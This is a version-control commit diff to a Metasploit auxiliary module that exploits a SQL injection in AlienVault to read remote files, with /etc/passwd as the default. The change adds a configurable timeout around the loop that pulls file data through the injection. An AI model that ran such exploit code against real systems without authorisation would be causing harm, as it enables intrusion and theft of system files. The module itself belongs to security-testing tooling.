Add Timeout to exploit sqli

2014-09-19 15:00:54 -05:00 · 2014-09-19 15:00:54 -05:00 · 62414e2214
parent db6372ec8b
commit 62414e2214
1 changed files with 21 additions and 9 deletions
--- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
+++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
@ -41,7 +41,8 @@ class Metasploit4 < Msf::Auxiliary
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
        OptString.new('USERNAME', [ true, 'Single username' ]),
        OptString.new('PASSWORD', [ true, 'Single password' ]),
-        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
+        OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ]),
+        OptInt.new('SQLI_TIMEOUT', [ true, 'Specify the maximum time to exploit the sqli (in seconds)', 60])
      ], self.class)
  end

@ -107,16 +108,27 @@ class Metasploit4 < Msf::Auxiliary

    print_status("#{peer} - Exploiting SQLi...")

-    loop do
-      file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
-      return if file.nil?
-      break if file.empty?
+    begin
+      ::Timeout.timeout(datastore['SQLI_TIMEOUT']) do
+        loop do
+          file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
+          return if file.nil?
+          break if file.empty?

-      str = [file].pack("H*")
-      full << str
-      vprint_status(str)
+          str = [file].pack("H*")
+          full << str
+          vprint_status(str)

-      i = i+1
+          i = i+1
+        end
+      end
+    rescue ::Timeout::Error
+      if full.blank?
+        print_error("#{peer} - Timeout while exploiting sqli, nothing recovered")
+      else
+        print_error("#{peer} - Timeout while exploiting sqli, #{full.length} bytes recovered")
+      end
+      return
    end

    path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])